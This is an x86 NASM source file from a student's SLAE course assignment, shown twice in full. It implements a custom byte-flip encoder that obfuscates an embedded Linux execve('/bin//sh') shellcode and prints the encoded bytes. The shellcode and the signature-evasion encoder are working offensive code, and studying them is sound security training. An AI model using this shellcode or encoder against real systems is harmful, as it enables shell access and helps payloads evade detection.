michaelnewton/assignment4-encoder.nasm

## assignment4-encoder.nasm
; Filename: assignment4-encoder.nasm
; Student ID: SLAE - 895
;
; Purpose: Assignment #4 Custom Byte Flip Encoder

extern printf
extern exit

global main

section .text
main:
        jmp long call_shellcode         ; Begins JMP-CALL-POP to get address of Shellcode

section .shellcode  progbits alloc exec write align=16
encoder:
        pop esi                         ; Puts the address of EncodedShellcode into esi
        lea edi, [esi]                  ; Loads the address into edi
        xor eax, eax                    ; Zero out eax
        mov al, 2                       ; Set 0x2 in al
        xor ebx, ebx                    ; Zero out ebx

encode:
        mov bl, byte [esi + eax]        ; Move the byte located at esi+eax into bl
        xor bl, 0x99                    ; Check for the end of the shellcode
        jz short init_reg               ; If XOR = zero we are done and jump to init_reg to begin print function
        xor bl, 0x99                    ; Reset bl to byte located in esi+eax
        mov byte [edi], bl              ; Move the byte into position
        add al, 2                       ; Increment eax by 2
        lea edi, [edi + 2]              ; Load address of new tmp stack pointer to edi
        jmp short encode                ; Repeat

init_reg:                               ; Initialise registers for printcode function
        xor eax, eax                    ; Zero out eax
        xor ebx, ebx                    ; Zero out ebx

printcode:                              ; Start loop to print each byte
        mov al, byte [esi + ebx]        ; Move the byte located at esi+ebx into bl
        xor al, 0x99                    ; Check for the end of the shellcode
        jz short exit_code              ; If XOR = zero we are done and jump to exit
        xor al, 0x99                    ; Reset bl to byte located in esi+eax
        add bl, 1                       ; Increment our counter
        push eax                        ; Push each byte to the stack as a argument for printf
        push FormatOutput               ; Push printf format string argument to the stack
        call printf                     ; Print byte to the screen
        jmp short printcode             ; Repeat

call_shellcode:                         ; Put original shellcode here and add 0x99 to the start and end with 0x99,0x99
        call encoder
        Shellcode: db 0x99,    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,    0x99,0x99
        FormatOutput: db "0x%hhx,", 0   ; Set the output format for printf
        new_line: db "",10,0            ; Finish with a new line

exit_code:
        push new_line
        call printf
        call exit
	; Filename: assignment4-encoder.nasm
	; Student ID: SLAE - 895
	;
	; Purpose: Assignment #4 Custom Byte Flip Encoder

	extern printf
	extern exit

	global main

	section .text
	main:
	jmp long call_shellcode ; Begins JMP-CALL-POP to get address of Shellcode

	section .shellcode progbits alloc exec write align=16
	encoder:
	pop esi ; Puts the address of EncodedShellcode into esi
	lea edi, [esi] ; Loads the address into edi
	xor eax, eax ; Zero out eax
	mov al, 2 ; Set 0x2 in al
	xor ebx, ebx ; Zero out ebx

	encode:
	mov bl, byte [esi + eax] ; Move the byte located at esi+eax into bl
	xor bl, 0x99 ; Check for the end of the shellcode
	jz short init_reg ; If XOR = zero we are done and jump to init_reg to begin print function
	xor bl, 0x99 ; Reset bl to byte located in esi+eax
	mov byte [edi], bl ; Move the byte into position
	add al, 2 ; Increment eax by 2
	lea edi, [edi + 2] ; Load address of new tmp stack pointer to edi
	jmp short encode ; Repeat

	init_reg: ; Initialise registers for printcode function
	xor eax, eax ; Zero out eax
	xor ebx, ebx ; Zero out ebx

	printcode: ; Start loop to print each byte
	mov al, byte [esi + ebx] ; Move the byte located at esi+ebx into bl
	xor al, 0x99 ; Check for the end of the shellcode
	jz short exit_code ; If XOR = zero we are done and jump to exit
	xor al, 0x99 ; Reset bl to byte located in esi+eax
	add bl, 1 ; Increment our counter
	push eax ; Push each byte to the stack as a argument for printf
	push FormatOutput ; Push printf format string argument to the stack
	call printf ; Print byte to the screen
	jmp short printcode ; Repeat

	call_shellcode: ; Put original shellcode here and add 0x99 to the start and end with 0x99,0x99
	call encoder
	Shellcode: db 0x99, 0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80, 0x99,0x99
	FormatOutput: db "0x%hhx,", 0 ; Set the output format for printf
	new_line: db "",10,0 ; Finish with a new line

	exit_code:
	push new_line
	call printf
	call exit